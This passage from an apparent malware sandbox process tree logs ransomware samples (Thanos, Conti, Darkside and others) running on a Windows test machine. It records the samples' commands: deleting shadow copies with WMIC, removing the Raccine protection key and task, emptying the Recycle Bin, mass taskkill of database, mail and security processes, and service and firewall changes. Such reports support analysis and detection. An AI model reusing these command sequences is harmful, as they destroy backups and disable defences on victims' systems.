                                          "C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 HEUR-Trojan-Ransom.MSIL.Thanos.gen-4852f22df095db43f2a92e99384ff7667020413e74f67fcbd42fca16f8f96f4c.exe
                                          4⤵
                                            PID:5968
                                          • C:\Windows\SysWOW64\reg.exe
                                            "reg" delete HKCU\Software\Raccine /F
                                            4⤵
                                            • Modifies registry key
                                            PID:5296
                                          • C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe
                                            "C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 HEUR-Trojan-Ransom.MSIL.Thanos.gen-4852f22df095db43f2a92e99384ff7667020413e74f67fcbd42fca16f8f96f4c.exe *32
                                            4⤵
                                              PID:5204
                                            • C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe
                                              "C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 conhost.exe
                                              4⤵
                                                PID:5336
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                "schtasks" /DELETE /TN "Raccine Rules Updater" /F
                                                4⤵
                                                  PID:2424
                                                • C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 net.exe
                                                  4⤵
                                                    PID:5724
                                                    • C:\Windows\System32\Conhost.exe
                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      5⤵
                                                        PID:3296
                                                    • C:\Windows\SysWOW64\sc.exe
                                                      "sc.exe" config Dnscache start= auto
                                                      4⤵
                                                      • Launches sc.exe
                                                      PID:5428
                                                    • C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 net1.exe
                                                      4⤵
                                                        PID:5824
                                                      • C:\Windows\SysWOW64\sc.exe
                                                        "sc.exe" config FDResPub start= auto
                                                        4⤵
                                                        • Launches sc.exe
                                                        PID:5424
                                                      • C:\Windows\SysWOW64\sc.exe
                                                        "sc.exe" config SSDPSRV start= auto
                                                        4⤵
                                                        • Launches sc.exe
                                                        PID:2864
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
                                                        4⤵
                                                          PID:5652
                                                        • C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 ARP.EXE
                                                          4⤵
                                                            PID:5340
                                                          • C:\Windows\SysWOW64\sc.exe
                                                            "sc.exe" config upnphost start= auto
                                                            4⤵
                                                            • Launches sc.exe
                                                            PID:2044
                                                          • C:\Windows\SysWOW64\sc.exe
                                                            "sc.exe" config SQLTELEMETRY start= disabled
                                                            4⤵
                                                            • Launches sc.exe
                                                            PID:5580
                                                          • C:\Windows\SysWOW64\sc.exe
                                                            "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
                                                            4⤵
                                                            • Launches sc.exe
                                                            PID:1184
                                                          • C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 icacls.exe
                                                            4⤵
                                                              PID:5152
                                                            • C:\Windows\SysWOW64\sc.exe
                                                              "sc.exe" config SQLWriter start= disabled
                                                              4⤵
                                                              • Launches sc.exe
                                                              PID:5204
                                                            • C:\Windows\SysWOW64\sc.exe
                                                              "sc.exe" config SstpSvc start= disabled
                                                              4⤵
                                                              • Launches sc.exe
                                                              PID:4856
                                                            • C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 cmd.exe
                                                              4⤵
                                                                PID:5964
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                "taskkill.exe" /IM mspub.exe /F
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:5468
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                "taskkill.exe" /IM firefoxconfig.exe /F
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:2044
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                "taskkill.exe" /IM excel.exe /F
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:5480
                                                              • C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 HEUR-Trojan-Ransom.MSIL.Thanos.gen-4852f22df095db43f2a92e99384ff7667020413e74f67fcbd42fca16f8f96f4c.exe
                                                                4⤵
                                                                  PID:2764
                                                                • C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 HEUR-Trojan-Ransom.MSIL.Thanos.gen-4852f22df095db43f2a92e99384ff7667020413e74f67fcbd42fca16f8f96f4c.exe *32
                                                                  4⤵
                                                                    PID:6488
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    "taskkill.exe" /IM thebat64.exe /F
                                                                    4⤵
                                                                    • Kills process with taskkill
                                                                    PID:7732
                                                                  • C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 conhost.exe
                                                                    4⤵
                                                                      PID:116
                                                                    • C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 net.exe
                                                                      4⤵
                                                                        PID:6196
                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                        "taskkill.exe" /IM CNTAoSMgr.exe /F
                                                                        4⤵
                                                                        • Kills process with taskkill
                                                                        PID:4448
                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                        "taskkill.exe" /IM mydesktopqos.exe /F
                                                                        4⤵
                                                                        • Kills process with taskkill
                                                                        PID:6344
                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                        "taskkill.exe" IM thunderbird.exe /F
                                                                        4⤵
                                                                        • Kills process with taskkill
                                                                        PID:6328
                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                        "taskkill.exe" /IM isqlplussvc.exe /F
                                                                        4⤵
                                                                        • Kills process with taskkill
                                                                        PID:6752
                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                        "taskkill.exe" /IM agntsvc.exe /F
                                                                        4⤵
                                                                        • Kills process with taskkill
                                                                        PID:6956
                                                                      • C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 net1.exe
                                                                        4⤵
                                                                          PID:7776
                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                          "taskkill.exe" /IM ocomm.exe /F
                                                                          4⤵
                                                                          • Kills process with taskkill
                                                                          PID:4308
                                                                        • C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 ARP.EXE
                                                                          4⤵
                                                                            PID:8008
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            "taskkill.exe" /IM dbsnmp.exe /F
                                                                            4⤵
                                                                            • Kills process with taskkill
                                                                            PID:5832
                                                                          • C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 icacls.exe
                                                                            4⤵
                                                                              PID:7068
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              "taskkill.exe" /IM mydesktopservice.exe /F
                                                                              4⤵
                                                                              • Kills process with taskkill
                                                                              PID:7100
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              "taskkill.exe" /IM sqlwriter.exe /F
                                                                              4⤵
                                                                              • Kills process with taskkill
                                                                              PID:6980
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              "taskkill.exe" /IM onenote.exe /F
                                                                              4⤵
                                                                              • Kills process with taskkill
                                                                              PID:5520
                                                                            • C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 cmd.exe
                                                                              4⤵
                                                                                PID:7160
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                "taskkill.exe" /IM thebat.exe /F
                                                                                4⤵
                                                                                • Kills process with taskkill
                                                                                PID:6396
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                "taskkill.exe" /IM tmlisten.exe /F
                                                                                4⤵
                                                                                • Kills process with taskkill
                                                                                PID:7552
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                "taskkill.exe" /IM infopath.exe /F
                                                                                4⤵
                                                                                • Kills process with taskkill
                                                                                PID:9576
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                "taskkill.exe" /IM xfssvccon.exe /F
                                                                                4⤵
                                                                                • Kills process with taskkill
                                                                                PID:8860
                                                                              • C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 HEUR-Trojan-Ransom.MSIL.Thanos.gen-4852f22df095db43f2a92e99384ff7667020413e74f67fcbd42fca16f8f96f4c.exe
                                                                                4⤵
                                                                                  PID:6508
                                                                                • C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 HEUR-Trojan-Ransom.MSIL.Thanos.gen-4852f22df095db43f2a92e99384ff7667020413e74f67fcbd42fca16f8f96f4c.exe *32
                                                                                  4⤵
                                                                                    PID:9732
                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                    "taskkill.exe" /IM mysqld.exe /F
                                                                                    4⤵
                                                                                    • Kills process with taskkill
                                                                                    PID:8024
                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                    "taskkill.exe" /IM tbirdconfig.exe /F
                                                                                    4⤵
                                                                                    • Kills process with taskkill
                                                                                    PID:8652
                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                    "taskkill.exe" /IM PccNTMon.exe /F
                                                                                    4⤵
                                                                                    • Kills process with taskkill
                                                                                    PID:10016
                                                                                  • C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 conhost.exe
                                                                                    4⤵
                                                                                      PID:8596
                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                      "taskkill.exe" /IM steam.exe /F
                                                                                      4⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:7944
                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                      "taskkill.exe" /IM mbamtray.exe /F
                                                                                      4⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:9664
                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                      "taskkill.exe" /IM mspub.exe /F
                                                                                      4⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:9936
                                                                                    • C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 net.exe
                                                                                      4⤵
                                                                                        PID:2316
                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                        "taskkill.exe" /IM msftesql.exe /F
                                                                                        4⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:6632
                                                                                      • C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 net1.exe
                                                                                        4⤵
                                                                                          PID:9780
                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                          "taskkill.exe" /IM sqbcoreservice.exe /F
                                                                                          4⤵
                                                                                          • Kills process with taskkill
                                                                                          PID:9268
                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                          "taskkill.exe" /IM dbeng50.exe /F
                                                                                          4⤵
                                                                                          • Kills process with taskkill
                                                                                          PID:5008
                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                          "taskkill.exe" /IM msaccess.exe /F
                                                                                          4⤵
                                                                                          • Kills process with taskkill
                                                                                          PID:8472
                                                                                        • C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 ARP.EXE
                                                                                          4⤵
                                                                                            PID:5196
                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                            "taskkill.exe" /IM encsvc.exe /F
                                                                                            4⤵
                                                                                            • Kills process with taskkill
                                                                                            PID:9360
                                                                                          • C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 icacls.exe
                                                                                            4⤵
                                                                                              PID:8376
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              "taskkill.exe" /IM Ntrtscan.exe /F
                                                                                              4⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:6672
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              "taskkill.exe" /IM powerpnt.exe /F
                                                                                              4⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:6288
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              "taskkill.exe" /IM zoolz.exe /F
                                                                                              4⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:9332
                                                                                            • C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 cmd.exe
                                                                                              4⤵
                                                                                                PID:7568
                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                "taskkill.exe" /IM mydesktopqos.exe /F
                                                                                                4⤵
                                                                                                • Kills process with taskkill
                                                                                                PID:4928
                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                "taskkill.exe" /IM mydesktopservice.exe /F
                                                                                                4⤵
                                                                                                • Kills process with taskkill
                                                                                                PID:8120
                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                "taskkill.exe" /IM outlook.exe /F
                                                                                                4⤵
                                                                                                • Kills process with taskkill
                                                                                                PID:8212
                                                                                              • C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 HEUR-Trojan-Ransom.MSIL.Thanos.gen-4852f22df095db43f2a92e99384ff7667020413e74f67fcbd42fca16f8f96f4c.exe
                                                                                                4⤵
                                                                                                  PID:8136
                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                  "taskkill.exe" /IM ocautoupds.exe /F
                                                                                                  4⤵
                                                                                                  • Kills process with taskkill
                                                                                                  PID:6944
                                                                                                • C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 HEUR-Trojan-Ransom.MSIL.Thanos.gen-4852f22df095db43f2a92e99384ff7667020413e74f67fcbd42fca16f8f96f4c.exe *32
                                                                                                  4⤵
                                                                                                    PID:5240
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    "taskkill.exe" /IM sqlservr.exe /F
                                                                                                    4⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:7052
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    "taskkill.exe" /IM visio.exe /F
                                                                                                    4⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:7112
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 conhost.exe
                                                                                                    4⤵
                                                                                                      PID:9956
                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                      "taskkill.exe" /IM winword.exe /F
                                                                                                      4⤵
                                                                                                      • Kills process with taskkill
                                                                                                      PID:8416
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 net.exe
                                                                                                      4⤵
                                                                                                        PID:5560
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        "taskkill.exe" /IM ocssd.exe /F
                                                                                                        4⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:8784
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        "taskkill.exe" /IM synctime.exe /F
                                                                                                        4⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:8572
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\qpbjice0.exe" 3468 net1.exe
                                                                                                        4⤵
                                                                                                          PID:6044
                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                          "taskkill.exe" /IM mysqld-nt.exe /F
                                                                                                          4⤵
                                                                                                          • Kills process with taskkill
                                                                                                          PID:8884
                                                                                                      • C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Conti.gen-bc9e62441e8da444a8b03f9a65ee30c285b918b20bc1cbc9dcfa3cf4555a9de8.exe
                                                                                                        HEUR-Trojan-Ransom.Win32.Conti.gen-bc9e62441e8da444a8b03f9a65ee30c285b918b20bc1cbc9dcfa3cf4555a9de8.exe
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:4812
                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                          cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B73E7983-AA33-419D-BAF8-A90C0C18FA26}'" delete
                                                                                                          4⤵
                                                                                                            PID:3840
                                                                                                            • C:\Windows\System32\wbem\WMIC.exe
                                                                                                              C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B73E7983-AA33-419D-BAF8-A90C0C18FA26}'" delete
                                                                                                              5⤵
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:5464
                                                                                                        • C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Convagent.gen-05474ec47384f809841c2d0a5ff1eacfcd16098ae716bb73ec6e228646729179.exe
                                                                                                          HEUR-Trojan-Ransom.Win32.Convagent.gen-05474ec47384f809841c2d0a5ff1eacfcd16098ae716bb73ec6e228646729179.exe
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:4956
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4956 -s 1808
                                                                                                            4⤵
                                                                                                            • Program crash
                                                                                                            PID:3596
                                                                                                        • C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-e3ecf4dc1b902b9f50eb00fc448f80b0e05436bd6c1c71840bad45d3ec6221af.exe
                                                                                                          HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-e3ecf4dc1b902b9f50eb00fc448f80b0e05436bd6c1c71840bad45d3ec6221af.exe
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Drops file in Program Files directory
                                                                                                          PID:1808
                                                                                                        • C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Cryptor.gen-3d8b6ccfcb742aeaac194c6a245ed08131a14919c4950039bf833c764e6d4f66.exe
                                                                                                          HEUR-Trojan-Ransom.Win32.Cryptor.gen-3d8b6ccfcb742aeaac194c6a245ed08131a14919c4950039bf833c764e6d4f66.exe
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:5096
                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                            cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B73E7983-AA33-419D-BAF8-A90C0C18FA26}'" delete
                                                                                                            4⤵
                                                                                                              PID:660
                                                                                                              • C:\Windows\System32\wbem\WMIC.exe
                                                                                                                C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B73E7983-AA33-419D-BAF8-A90C0C18FA26}'" delete
                                                                                                                5⤵
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:5476
                                                                                                          • C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Cryptor.gen-5c5d05c4dcc9489ed527a1a607f0e2884d10558451662bcc849e36da7eca570c.exe
                                                                                                            HEUR-Trojan-Ransom.Win32.Cryptor.gen-5c5d05c4dcc9489ed527a1a607f0e2884d10558451662bcc849e36da7eca570c.exe
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:4644
                                                                                                          • C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Cryptor.gen-b800bf6f11170ff68cd552484fa144571069513adad2d75ac7462b126b5f0816.exe
                                                                                                            HEUR-Trojan-Ransom.Win32.Cryptor.gen-b800bf6f11170ff68cd552484fa144571069513adad2d75ac7462b126b5f0816.exe
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:4620
                                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                                              cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B73E7983-AA33-419D-BAF8-A90C0C18FA26}'" delete
                                                                                                              4⤵
                                                                                                                PID:4512
                                                                                                                • C:\Windows\System32\wbem\WMIC.exe
                                                                                                                  C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B73E7983-AA33-419D-BAF8-A90C0C18FA26}'" delete
                                                                                                                  5⤵
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:5560
                                                                                                            • C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Cryptor.gen-dccdb2a42dc68462807d81b94f1254d92356c8b6d1da660ed047d8a6bfc8debe.exe
                                                                                                              HEUR-Trojan-Ransom.Win32.Cryptor.gen-dccdb2a42dc68462807d81b94f1254d92356c8b6d1da660ed047d8a6bfc8debe.exe
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:3296
                                                                                                            • C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe
                                                                                                              HEUR-Trojan-Ransom.Win32.Darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:5056
                                                                                                            • C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Encoder.gen-11dd8b2605b8ef05a481ee4b8839596b5eeff327b57c81271e400f57d544d848.exe
                                                                                                              HEUR-Trojan-Ransom.Win32.Encoder.gen-11dd8b2605b8ef05a481ee4b8839596b5eeff327b57c81271e400f57d544d848.exe
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Enumerates connected drives
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              • Checks processor information in registry
                                                                                                              PID:832
                                                                                                            • C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Encoder.gen-147312e093c1a4f70f06fd0597f5f9bfd0c648c6d4b37be26f6bb956a1fc13bc.exe
                                                                                                              HEUR-Trojan-Ransom.Win32.Encoder.gen-147312e093c1a4f70f06fd0597f5f9bfd0c648c6d4b37be26f6bb956a1fc13bc.exe
                                                                                                              3⤵
                                                                                                              • Checks computer location settings
                                                                                                              • Executes dropped EXE
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:1716
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\DARK_BLITZ.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\DARK_BLITZ.exe"
                                                                                                                4⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:1828
                                                                                                            • C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3bca71282c685bf813ca9a3b51180fa51aecd6d7bf29638006da7b8fd4ba4022.exe
                                                                                                              HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3bca71282c685bf813ca9a3b51180fa51aecd6d7bf29638006da7b8fd4ba4022.exe
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:3084
                                                                                                            • C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Gen.gen-50416e50797cf88a48d086e718c003e2d10c3847b1a251669d6f10f8d3546e03.exe
                                                                                                              HEUR-Trojan-Ransom.Win32.Gen.gen-50416e50797cf88a48d086e718c003e2d10c3847b1a251669d6f10f8d3546e03.exe
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Drops file in Windows directory
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:5264
                                                                                                              • C:\Windows\MsMpEng.exe
                                                                                                                "C:\Windows\MsMpEng.exe"
                                                                                                                4⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Loads dropped DLL
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:5308
                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                  netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
                                                                                                                  5⤵
                                                                                                                  • Modifies Windows Firewall
                                                                                                                  PID:3472
                                                                                                            • C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Generic-1198f7a8f6cc4f524fd18e90351d3a01d4f44607df66d42ece6745a72da50163.exe
                                                                                                              HEUR-Trojan-Ransom.Win32.Generic-1198f7a8f6cc4f524fd18e90351d3a01d4f44607df66d42ece6745a72da50163.exe
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:5608
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "cmd.exe"
                                                                                                                4⤵
                                                                                                                  PID:6008
                                                                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                    wmic csproduct get uuid
                                                                                                                    5⤵
                                                                                                                      PID:5492
                                                                                                                • C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Generic-14f9538dd611ca701bdbc6b34a0562e8b18c2492ff323b32557b36673434541a.exe
                                                                                                                  HEUR-Trojan-Ransom.Win32.Generic-14f9538dd611ca701bdbc6b34a0562e8b18c2492ff323b32557b36673434541a.exe
                                                                                                                  3⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:5672
                                                                                                                • C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Generic-d29b8160e51dd29474f3464111fc888da8adb2bc2f0d4f29ce71219ffc846bd5.exe
                                                                                                                  HEUR-Trojan-Ransom.Win32.Generic-d29b8160e51dd29474f3464111fc888da8adb2bc2f0d4f29ce71219ffc846bd5.exe
                                                                                                                  3⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:5684
                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                    cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B73E7983-AA33-419D-BAF8-A90C0C18FA26}'" delete
                                                                                                                    4⤵
                                                                                                                      PID:6136
                                                                                                                      • C:\Windows\System32\wbem\WMIC.exe
                                                                                                                        C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B73E7983-AA33-419D-BAF8-A90C0C18FA26}'" delete
                                                                                                                        5⤵
                                                                                                                          PID:5860
                                                                                                                    • C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Generic-dbfee080eb99d2c1fcba7e7d72191cef3b9f00ebd279a62147ccfb1ae17bdd84.exe
                                                                                                                      HEUR-Trojan-Ransom.Win32.Generic-dbfee080eb99d2c1fcba7e7d72191cef3b9f00ebd279a62147ccfb1ae17bdd84.exe
                                                                                                                      3⤵
                                                                                                                        PID:5696
                                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                          cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B73E7983-AA33-419D-BAF8-A90C0C18FA26}'" delete
                                                                                                                          4⤵
                                                                                                                            PID:6128
                                                                                                                            • C:\Windows\System32\wbem\WMIC.exe
                                                                                                                              C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B73E7983-AA33-419D-BAF8-A90C0C18FA26}'" delete
                                                                                                                              5⤵
                                                                                                                                PID:280
                                                                                                                          • C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Generic-eb2c139afa264021f31c5bdb7ec16e0f661d6922f7d9d54770a571f8df51e7c2.exe
                                                                                                                            HEUR-Trojan-Ransom.Win32.Generic-eb2c139afa264021f31c5bdb7ec16e0f661d6922f7d9d54770a571f8df51e7c2.exe
                                                                                                                            3⤵
                                                                                                                              PID:5720
                                                                                                                            • C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Mbro.gen-6c76ed03971ac0f2e98f6bbadb1495a0032037592ded5b3630b1baaf0ea40b71.exe
                                                                                                                              HEUR-Trojan-Ransom.Win32.Mbro.gen-6c76ed03971ac0f2e98f6bbadb1495a0032037592ded5b3630b1baaf0ea40b71.exe
